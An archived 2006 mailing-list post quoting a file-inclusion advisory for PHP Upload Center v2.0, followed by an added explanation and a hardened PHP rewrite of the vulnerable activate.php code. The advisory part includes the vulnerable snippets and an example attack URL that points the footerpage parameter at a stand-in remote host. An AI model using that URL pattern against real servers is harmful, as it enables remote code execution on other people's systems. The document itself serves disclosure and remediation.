Security Incidents mailing list archives
Re: http://thebesthack.altervista.org/input.txt
From: santa () northpole com
Date: 14 Dec 2006 00:45:58 -0000
*************************************************************************
 * Name     = PHP Upload Center v2.0
 * Class    = Remote/Local File Inclusion
 * Download = http://skrypty.webpc.pl/pobierz.php?id=58
 * Found by = GregStar (gregstar[at]c4f[dot]pl) (http://c4f.pl)
-------------------------------------------------------------------------

Vulnerable code in activate.php, lines 66-70:

...
if (!isset($language)) $language=$dft_language;
if ($language=="") $language=$dft_language;
require("include/${language}.php");   <== Local incl.
...

activate.php, line 164:

...
include($footerpage);                 <== Remote incl.
...

Code in include/en.php (and other language files), lines 5-7:

...
$headerpage="include/header.htm";
$footerpage="include/footer.htm";     <==
$infopage="include/info.htm";
...

- Ex.: http://[target]/[path]/activate.php?language=conf&footerpage=http://evil?

*************************************************************************
Gr33tz: sASAn, marcel3miasto, masS, kaziq, Abi, kociaq, SlashBeast, chochlik, rfl, d3m0n, java, reyw, kw@ch.
*************************************************************************
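Both inclusions in the advisory depend on PHP's register_globals: $language and $footerpage are never read from $_GET, they simply appear as globals populated from the query string. Reading the snippets as posted, $language is only checked for "unset" or "empty" before being spliced into require(), and the example URL picks language=conf rather than a language file, so the $footerpage value supplied in the request is not overwritten by include/en.php before include($footerpage) runs. The following is an added, hardened rewrite of that activate.php pattern; it is not code from PHP Upload Center or from the advisory, and the whitelist of language names, the constant APP_ROOT and the helper names resolve_language() and include_path() are assumptions made for the example.

```php
<?php
// Added example, not PHP Upload Center code. Hardened form of the
// activate.php pattern from the advisory: the language comes explicitly
// from $_GET (never via register_globals), is matched against a whitelist,
// and every template path is proven to lie under include/ before
// require()/include() sees it, so no request parameter can redirect them.

define('APP_ROOT', __DIR__);                  // assumption: script lives in the app root
$dft_language      = 'en';
$allowed_languages = array('en', 'pl', 'de'); // assumption: language files that ship

// Return a whitelisted language name or the default. Non-strings (e.g.
// language[]=x) and unknown names fall back to the default instead of
// reaching require().
function resolve_language($requested, array $allowed, $default)
{
    if (!is_string($requested) || $requested === '') {
        return $default;
    }
    return in_array($requested, $allowed, true) ? $requested : $default;
}

// Resolve a relative template path and confirm it stays inside
// APP_ROOT/include after symlinks and ".." are collapsed. Anything else,
// including http:// and php:// wrappers (realpath() does not resolve
// them), yields false.
function include_path($relative)
{
    if (!is_string($relative) || $relative === '') {
        return false;
    }
    $base = realpath(APP_ROOT . '/include');
    $path = realpath(APP_ROOT . '/' . $relative);
    if ($base === false || $path === false) {
        return false;
    }
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $path;
}

$language = resolve_language(
    isset($_GET['language']) ? $_GET['language'] : null,
    $allowed_languages,
    $dft_language
);

$langfile = include_path('include/' . $language . '.php');
if ($langfile === false) {
    http_response_code(500);
    exit('language file missing');
}
require $langfile;

// The language file defines $headerpage/$footerpage/$infopage. With
// register_globals off they cannot arrive from the request, but the path
// is still validated so a tampered language file cannot point elsewhere.
$footer = include_path($footerpage);
if ($footer === false) {
    http_response_code(500);
    exit('bad footer template');
}
include $footer;
```

The realpath() prefix check is what closes the local side of the bug: "include/../../etc/passwd" or a null-byte truncated name resolves outside APP_ROOT/include and is rejected, while the whitelist closes the remote side because a URL can never equal one of the shipped language names. Disabling register_globals (off by default since PHP 4.2, removed in 5.4) and allow_url_include are the configuration counterparts; the code above does not rely on either being set correctly.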
Current thread:
- http://thebesthack.altervista.org/input.txt modincidents (Dec 13)
- Re: http://thebesthack.altervista.org/input.txt Bojan Zdrnja (Dec 13)
- Re: http://thebesthack.altervista.org/input.txt ascii (Dec 14)
- Re: http://thebesthack.altervista.org/input.txt Adriano Carvalho (Dec 14)
- <Possible follow-ups>
- Re: http://thebesthack.altervista.org/input.txt santa (Dec 13)